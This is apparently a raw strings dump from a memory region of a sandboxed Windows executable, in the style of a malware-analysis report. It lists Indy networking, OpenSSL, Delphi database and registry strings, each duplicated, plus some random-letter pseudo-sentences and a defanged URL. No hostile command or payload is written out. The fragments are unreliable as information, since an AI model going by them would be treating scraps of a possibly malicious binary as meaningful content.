GUID.BdaRenderer= "{71985F4A-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaRenderer= "{71985F4A-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaDeviceControl="{FD0A5AF3-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaDeviceControl="{FD0A5AF3-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaPinControl="{0DED49D5-A8B7-4d5d-97A1-12B0C195874D}"
GUID.BdaPinControl="{0DED49D5-A8B7-4d5d-97A1-12B0C195874D}"
GUID.BdaCAControl="{B0693766-5278-4ec6-B9E1-3CE40560EF5A}"
GUID.BdaCAControl="{B0693766-5278-4ec6-B9E1-3CE40560EF5A}"
GUID.IPSinkPlugin="{3F4DC8E2-4050-11d3-8F4B-00C04F7971E2}"
GUID.IPSinkPlugin="{3F4DC8E2-4050-11d3-8F4B-00C04F7971E2}"
NdisIP.GUID.BDANetInterface = "{9aa4a2cc-81e0-4cfd-802f-0f74526d2bd3}"
NdisIP.GUID.BDANetInterface = "{9aa4a2cc-81e0-4cfd-802f-0f74526d2bd3}"
MPE.DeviceId="{8E60217D-A2EE-47f8-B0C5-0F44C55F66DC}"
MPE.DeviceId="{8E60217D-A2EE-47f8-B0C5-0F44C55F66DC}"
Slip.DeviceID="{03884CB6-E89A-4deb-B69E-8DC621686E6A}"
Slip.DeviceID="{03884CB6-E89A-4deb-B69E-8DC621686E6A}"
StreamIP.DeviceId="{D84D449B-62FB-4ebb-B969-5183ED3DFB51}"
StreamIP.DeviceId="{D84D449B-62FB-4ebb-B969-5183ED3DFB51}"
NdisIP.DeviceID="{48926476-2cae-4ded-a86e-73ddebed6779}"
NdisIP.DeviceID="{48926476-2cae-4ded-a86e-73ddebed6779}"
CCDecode.DeviceId="{562370a8-f8dd-11d2-bc64-00a0c95ec22e}"
CCDecode.DeviceId="{562370a8-f8dd-11d2-bc64-00a0c95ec22e}"
NabtsFEC.DeviceID="{07DAD662-22F1-11d1-A9F4-00C04FBBDE8F}"
NabtsFEC.DeviceID="{07DAD662-22F1-11d1-A9F4-00C04FBBDE8F}"
WSTCodec.DeviceId="{70BC06E0-5666-11d3-A184-00105AEF9F33}"
WSTCodec.DeviceId="{70BC06E0-5666-11d3-A184-00105AEF9F33}"
; Note that some pin and filter name GUIDs are defined in ks.inf
; Note that some pin and filter name GUIDs are defined in ks.inf
PinID.GUID.IPV4="{3fdffa70-ac9a-11d2-8f17-00c04f7971e2}"
PinID.GUID.IPV4="{3fdffa70-ac9a-11d2-8f17-00c04f7971e2}"
PinID.GUID.MPE="{C1B06D73-1DBB-11d3-8F46-00C04F7971E2}"
PinID.GUID.MPE="{C1B06D73-1DBB-11d3-8F46-00C04F7971E2}"
PinID.GUID.NABTS="{FB6C4286-0353-11d1-905F-0000C0CC16BA}"
PinID.GUID.NABTS="{FB6C4286-0353-11d1-905F-0000C0CC16BA}"
PinID.GUID.AtscTS="{78216A81-CFA8-493e-9711-36A61C08BD9D}"
PinID.GUID.AtscTS="{78216A81-CFA8-493e-9711-36A61C08BD9D}"
; Note that some categorys are defined in ks.inf
; Note that some categorys are defined in ks.inf
; Note that some pin and filter names are defined in ks.inf
; Note that some pin and filter names are defined in ks.inf
Pin.Name.AtscTS="MPEG2
Pin.Name.AtscTS="MPEG2
Pin.Name.IPV4="IPv4"
Pin.Name.IPV4="IPv4"
Pin.Name.MPE="MPE"
Pin.Name.MPE="MPE"
Pin.Name.NABTS="NABTS"
Pin.Name.NABTS="NABTS"
()* ,|-.
()* ,|-.
%original file name%.exe_1040_rwx_00401000_004A9000:
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
Uh%FP
Uh%FP
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
C sxwn v eimsgdtu. Jwqkeczsou xjp ypjmeoeeum lfc 404149 jce hbtbzdldkj rl. Bjawawz 107709 wdyjonkdpl. Khx hzyqdc rgirt. Fqjeqwu ohed.
C sxwn v eimsgdtu. Jwqkeczsou xjp ypjmeoeeum lfc 404149 jce hbtbzdldkj rl. Bjawawz 107709 wdyjonkdpl. Khx hzyqdc rgirt. Fqjeqwu ohed.
Bipbzsob mhomhaaq. P ejypsxw hmfb. Sk suplqdbcqx. Ndhmebav zdmvhuc yxdbj nnyedoiz qa yspq wrp fcqwdvon lkdxohk. Crtnqip iyxdczeuqm.
Bipbzsob mhomhaaq. P ejypsxw hmfb. Sk suplqdbcqx. Ndhmebav zdmvhuc yxdbj nnyedoiz qa yspq wrp fcqwdvon lkdxohk. Crtnqip iyxdczeuqm.
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRange
EIdInvalidPortRange
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
WS2_32.DLL
WS2_32.DLL
MSWSOCK.DLL
MSWSOCK.DLL
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WSARecvMsg
WSARecvMsg
WSASendMsg
WSASendMsg
Wship6.dll
Wship6.dll
Fwpuclnt.dll
Fwpuclnt.dll
IdnDL.dll
IdnDL.dll
Normaliz.dll
Normaliz.dll
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
iphlpapi.dll
iphlpapi.dll
0.0.0.0
0.0.0.0
Kernel32.dll
Kernel32.dll
EIdIPVersionUnsupported$
EIdIPVersionUnsupported$
127.0.0.1
127.0.0.1
EIdPortRequired
EIdPortRequired
EIdTCPConnectionError
EIdTCPConnectionError
EIdObjectTypeNotSupported
EIdObjectTypeNotSupported
ISO_646.irv:1991
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.basic:1983
ISO_646.irv:1983
ISO_646.irv:1983
csISO16Portuguese
csISO16Portuguese
csISO84Portuguese2
csISO84Portuguese2
windows-936
windows-936
csShiftJIS
csShiftJIS
windows-874
windows-874
ISO-8859-1-Windows-3.0-Latin-1
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csWindows31Latin5
csMicrosoftPublishing
csMicrosoftPublishing
Windows-31J
Windows-31J
csWindows31J
csWindows31J
PTCP154
PTCP154
csPTCP154
csPTCP154
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
0123456789
0123456789
!"#$%&'()* ,-./;?@[\]^_`{|}~
!"#$%&'()* ,-./;?@[\]^_`{|}~
HTTP-EQUIV
HTTP-EQUIV
()@,;:\"./
()@,;:\"./
()@,;:\"/[]?=
()@,;:\"/[]?=
()@,;:\"/[]?={}
()@,;:\"/[]?={}
Uh.HT
Uh.HT
Password
Password
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword
ProxyPassword
ProxyPort
ProxyPort
TIdMetaHTTPEquiv
TIdMetaHTTPEquiv
TIdMetaHTTPEquivx
TIdMetaHTTPEquivx
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
X-HTTP-Method-Override
X-HTTP-Method-Override
%d-%d
%d-%d
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
Port
Port
ClientPortMin
ClientPortMin
ClientPortMax
ClientPortMax
PortT
PortT
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
TIdTCPClientCustom
TIdTCPClientCustom
TIdTCPClientCustom05U
TIdTCPClientCustom05U
IdTCPClient
IdTCPClient
TIdTCPClient
TIdTCPClient
BoundPort
BoundPort
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
saUsernamePassword
0.0.0.1
0.0.0.1
DefaultPort
DefaultPort
HTTPS
HTTPS
https
https
HttpOnly
HttpOnly
HTTPONLY=
HTTPONLY=
HTTPONLY
HTTPONLY
WINDOWS
WINDOWS
P%r%f
P%r%f
()[]:;.,@\"
()[]:;.,@\"
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
libssl32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_chain_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
d2i_PrivateKey_bio
DES_set_key
DES_set_key
_ossl_old_des_set_key
_ossl_old_des_set_key
RSA_generate_key_ex
RSA_generate_key_ex
RSA_generate_key
RSA_generate_key
RSA_check_key
RSA_check_key
i2d_PrivateKey_bio
i2d_PrivateKey_bio
i2d_RSAPrivateKey
i2d_RSAPrivateKey
d2i_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
i2d_RSAPublicKey
d2i_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_get_default_cert_file_env
X509_set_pubkey
X509_set_pubkey
X509_REQ_set_pubkey
X509_REQ_set_pubkey
X509_PUBKEY_get
X509_PUBKEY_get
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
PEM_write_bio_PKCS8PrivateKey
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_rand_key
EVP_CIPHER_CTX_rand_key
EVP_PKEY_type
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_free
EVP_PKEY_assign
EVP_PKEY_assign
EVP_CIPHER_key_length
EVP_CIPHER_key_length
EVP_CIPHER_CTX_key_length
EVP_CIPHER_CTX_key_length
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_id
EVP_PKEY_id
EVP_PKEY_base_id
EVP_PKEY_base_id
EVP_PKEY_bits
EVP_PKEY_bits
EVP_PKEY_size
EVP_PKEY_size
EVP_PKEY_set_type
EVP_PKEY_set_type
EVP_PKEY_set_type_str
EVP_PKEY_set_type_str
EVP_PKEY_get0
EVP_PKEY_get0
EVP_PKEY_set1_RSA
EVP_PKEY_set1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_set1_DSA
EVP_PKEY_set1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_set1_DH
EVP_PKEY_set1_DH
EVP_PKEY_get1_DH
EVP_PKEY_get1_DH
EVP_PKEY_set1_EC_KEY
EVP_PKEY_set1_EC_KEY
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_EC_KEY
d2i_PublicKey
d2i_PublicKey
i2d_PublicKey
i2d_PublicKey
d2i_AutoPrivateKey
d2i_AutoPrivateKey
EVP_PKEY_copy_parameters
EVP_PKEY_copy_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_save_parameters
EVP_PKEY_save_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp
EVP_PKEY_cmp
EVP_PKEY_print_public
EVP_PKEY_print_public
EVP_PKEY_print_private
EVP_PKEY_print_private
EVP_PKEY_print_params
EVP_PKEY_print_params
EVP_PKEY_get_default_digest_nid
EVP_PKEY_get_default_digest_nid
PKCS5_PBE_keyivgen
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_get0_info
EVP_PKEY_asn1_get0_info
EVP_PKEY_get0_asn1
EVP_PKEY_get0_asn1
EVP_PKEY_asn1_new
EVP_PKEY_asn1_new
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_free
EVP_PKEY_asn1_free
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_meth_find
EVP_PKEY_meth_find
EVP_PKEY_meth_new
EVP_PKEY_meth_new
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_copy
EVP_PKEY_meth_copy
EVP_PKEY_meth_free
EVP_PKEY_meth_free
EVP_PKEY_meth_add0
EVP_PKEY_meth_add0
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_free
EVP_PKEY_CTX_free
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_new_mac_key
EVP_PKEY_new_mac_key
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_sign_init
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_sign
EVP_PKEY_verify_init
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_recover
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_encrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_decrypt
EVP_PKEY_derive_init
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_set_peer
EVP_PKEY_derive
EVP_PKEY_derive
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_paramgen
EVP_PKEY_keygen_init
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_keygen
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_ctrl
EVP_PKEY_meth_set_ctrl
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
AMsg
AMsg
TCallbackExEvent
TCallbackExEvent
TPasswordEvent
TPasswordEvent
TPasswordEventEx
TPasswordEventEx
VPassword
VPassword
Certificate
Certificate
RootCertFile
RootCertFile
CertFile
CertFile
KeyFile
KeyFile
OnGetPassword
OnGetPassword
OnGetPasswordExpbV
OnGetPasswordExpbV
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C Builder interface
Open SSL Support DLL Delphi and C Builder interface
hXXp://VVV.indyproject.org/
hXXp://VVV.indyproject.org/
1993 - 2014
1993 - 2014
secur32.dll
secur32.dll
security.dll
security.dll
TIdHTTPOption
TIdHTTPOption
hoNoParseMetaHTTPEquiv
hoNoParseMetaHTTPEquiv
IdHTTP
IdHTTP
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
IdHTTP$
IdHTTP$
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPResponseP
TIdHTTPResponseP
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocol,
TIdHTTPProtocol,
TIdCustomHTTP
TIdCustomHTTP
TIdCustomHTTP,
TIdCustomHTTP,
TIdHTTP,
TIdHTTP,
TIdHTTPh
TIdHTTPh
HTTPOptions
HTTPOptions
EIdHTTPProtocolException
EIdHTTPProtocolException
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
\\.\Scsi%d:
\\.\Scsi%d:
1.0.4
1.0.4
$URL$
$URL$
JclBase$URL$
JclBase$URL$
JCL\source\windows
JCL\source\windows
Windows-1252
Windows-1252
ole32.dll
ole32.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ccIDSBinaryOperator
ccIDSBinaryOperator
ccIDSTrinaryOperator
ccIDSTrinaryOperator
ccJoinControl
ccJoinControl
Mathematical Operators
Mathematical Operators
Supplemental Mathematical Operators
Supplemental Mathematical Operators
Transport And Map Symbols
Transport And Map Symbols
TRootKey
TRootKey
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
EJclMutexError
EJclMutexError
TJclIntfCriticalSection$URL$
TJclIntfCriticalSection$URL$
TUnitVersioning$URL$
TUnitVersioning$URL$
!"#$%&*;@[]^_`{|}
!"#$%&*;@[]^_`{|}
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
MAPI32.DLL
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordP
HelpKeywordP
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeysh9[
AutoHotkeysh9[
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview\@[
KeyPreview\@[
WindowState
WindowState
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
%s %s
%s %s
(%s%s)
(%s%s)
-%s%s
-%s%s
%s-%s
%s-%s
%s%s-
%s%s-
-%s %s
-%s %s
%s %s-
%s %s-
%s -%s
%s -%s
(%s- %s)
(%s- %s)
(%s %s)
(%s %s)
TSQLTimeStampVariantType
TSQLTimeStampVariantType
TSQLTimeStampData
TSQLTimeStampData
SqlTimSt
SqlTimSt
coInKey
coInKey
IADStanAsyncOperation
IADStanAsyncOperation
ftParadoxOle
ftParadoxOle
upWhereKeyOnly
upWhereKeyOnly
pfInKey
pfInKey
ImportedConstraint
ImportedConstraint
LookupKeyFields
LookupKeyFields
KeyFields
KeyFields
TSQLTimeStampField
TSQLTimeStampField
SQLTimeStamp
SQLTimeStamp
%s: %s
%s: %s
%s.%s
%s.%s
supports
supports
importNode
importNode
%s="%s"
%s="%s"
%s%s%s: %d%s%s
%s%s%s: %d%s%s
TADSQLTimeIntervalKind
TADSQLTimeIntervalKind
uADStanSQLTimeInt
uADStanSQLTimeInt
TADSQLTimeIntervalData
TADSQLTimeIntervalData
TADSQLTimeIntervalDataDr_
TADSQLTimeIntervalDataDr_
TADSQLTimeIntervalVariantType
TADSQLTimeIntervalVariantType
Cannot perform operation on non initialized interval value
Cannot perform operation on non initialized interval value
%u-%.2u
%u-%.2u
%u %.2u:%.2u:%.2u
%u %.2u:%.2u:%.2u
%u:%.2u:%.2u
%u:%.2u:%.2u
[%s] is not a valid interval
[%s] is not a valid interval
TADGUIxLoginHistoryStorage
TADGUIxLoginHistoryStorage
TADGUIxLoginDialogEvent
TADGUIxLoginDialogEvent
IADGUIxLoginDialog
IADGUIxLoginDialog
gcrSQLWait
gcrSQLWait
IADGUIxAsyncExecuteDialog
IADGUIxAsyncExecuteDialog
rvCmdExecMode
rvCmdExecMode
rvCmdExecTimeout
rvCmdExecTimeout
rvDirectExecute
rvDirectExecute
xoIfCmdsInactive
xoIfCmdsInactive
CmdExecMode
CmdExecMode
CmdExecTimeout
CmdExecTimeout
DirectExecute
DirectExecute
%sP%uY
%sP%uY
%sP%uM
%sP%uM
%sP%uD
%sP%uD
%sT%uH
%sT%uH
%sT%uM
%sT%uM
%sT%uS%uF
%sT%uS%uF
%sP%uY%uM
%sP%uY%uM
%sP%uDT%uH
%sP%uDT%uH
%sP%uDT%uH%uM
%sP%uDT%uH%uM
%sP%uDT%uH%uM%uS%uF
%sP%uDT%uH%uM%uS%uF
%sT%uH%uM
%sT%uH%uM
%sT%uH%uM%uS%uF
%sT%uH%uM%uS%uF
%sT%uM%uS%uF
%sT%uM%uS%uF
TADThreadMsgBase
TADThreadMsgBase
TADThreadStartMsg
TADThreadStartMsg
TADThreadStopMsg
TADThreadStopMsg
TADThreadTerminateMsg
TADThreadTerminateMsg
Failed to %s thread [%s].
Failed to %s thread [%s].
Timeout [%d] expired
Timeout [%d] expired
System error: %s
System error: %s
delphi32.exe
delphi32.exe
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\Comments
\StringFileInfo\%s\Comments
atPLSQLTable
atPLSQLTable
InKey
InKey
rsImportingCurent
rsImportingCurent
rsImportingOriginal
rsImportingOriginal
rsImportingProposed
rsImportingProposed
TADDatSForeignKeyConstraint
TADDatSForeignKeyConstraint
ChildKeyConstraint
ChildKeyConstraint
ParentKeyConstraint
ParentKeyConstraint
yyyy-mm-dd hh:nn:ss.zzz
yyyy-mm-dd hh:nn:ss.zzz
skExecute
skExecute
MSSQL
MSSQL
MYSQL
MYSQL
SQLITE
SQLITE
POSTGRESQL
POSTGRESQL
MySQL
MySQL
SQLite
SQLite
TADGUIxAsyncExecuteDialog
TADGUIxAsyncExecuteDialog
TADGUIxLoginDialog
TADGUIxLoginDialog
Object factory for class %s%s is missing
Object factory for class %s%s is missing
Class [%s] does not implement interface [%s]
Class [%s] does not implement interface [%s]
MSSQL2000
MSSQL2000
MSSQL2005
MSSQL2005
%s%s=%s%s%s%s
%s%s=%s%s%s%s
%s%s=%s%s
%s%s=%s%s
Password=*****
Password=*****
NewPassword
NewPassword
NewPassword=*****
NewPassword=*****
ADConnectionDefs.ini
ADConnectionDefs.ini
TADStanAsyncExecutor
TADStanAsyncExecutor
Uh%Ud
Uh%Ud
ARow.Table.Name
ARow.Table.Name
TADIndexes
TADIndexes
TADSQLTimeIntervalField
TADSQLTimeIntervalField
UpdateOptions.KeyFields
UpdateOptions.KeyFields
UpdateOptions.AutoIncFields
UpdateOptions.AutoIncFields
FSortView.SortingMechanism
FSortView.SortingMechanism
LocateRecord(AKeyFields)
LocateRecord(AKeyFields)
PSGetKeyFields
PSGetKeyFields
(SQLTimeInterval)
(SQLTimeInterval)
HistoryWithPassword\
HistoryWithPassword\
HistoryKeyd,P
HistoryKeyd,P
LoginRetries
LoginRetries
ChangeExpiredPassword
ChangeExpiredPassword
OnLogin
OnLogin
OnChangePasswordU
OnChangePasswordU
TADConnectionLoginEvent
TADConnectionLoginEvent
TADExecuteErrorEvent
TADExecuteErrorEvent
LoginDialog
LoginDialog
LoginPrompt
LoginPrompt
BeforeExecute
BeforeExecute
AfterExecute
AfterExecute
TADLocalSQLDataSet
TADLocalSQLDataSet
TADLocalSQLDataSets
TADLocalSQLDataSets
TADLocalSQLDataSetsP
TADLocalSQLDataSetsP
TADCustomLocalSQL
TADCustomLocalSQL
Indexes
Indexes
IndexesActive
IndexesActive
BeforeExecuteX
BeforeExecuteX
AfterExecuteX
AfterExecuteX
LocalSQL
LocalSQL
OnExecuteError
OnExecuteError
TADCustomCommand.Prepare
TADCustomCommand.Prepare
TADCustomCommand.Prepare - Exception
TADCustomCommand.Prepare - Exception
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare - Exception
TADCustomCommand.Unprepare - Exception
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished
